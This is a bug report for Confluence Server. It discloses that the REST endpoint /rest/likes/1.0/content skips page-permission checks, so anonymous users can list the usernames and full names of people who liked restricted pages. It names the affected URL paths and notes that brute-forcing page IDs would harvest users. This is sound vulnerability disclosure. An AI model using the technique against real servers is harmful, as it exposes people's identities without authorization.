/rest/likes/1.0/content does not check page permissions properly

XMLWordPrintable

    • 5

      NOTE: This bug report is for Confluence Server. Using Confluence Cloud? See the corresponding bug report.

      ID: CONF-001 - Information Exposure
      CWE ID: 200
      CWE Description: An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information.
      Additional description: One REST service (/rest/likes/1.0/content) doesn't (properly) authenticate requests. An anonymous user can request a list of 'likes' from arbitrary pages that aren't accessible for anonymous users. Confluence returns a list of Confluence usernames as well as full usernames that 'like' that page.
      This could help an attacker: By bruteforcing page_ID it's possible to obtain a list of usernames and full usernames of all persons that have 'liked' one or more pages.
      Affected URL(s):
      /rest/likes/1.0/content/<page_ID>/likes
      /rest/likes/1.0/content/<page_ID>/comment-likes

            Assignee:
            Alice Wang (Inactive)
            Reporter:
            PeterMosmans
            Votes:
            0 Vote for this issue
            Watchers:
            3 Start watching this issue

              Created:
              Updated:
              Resolved: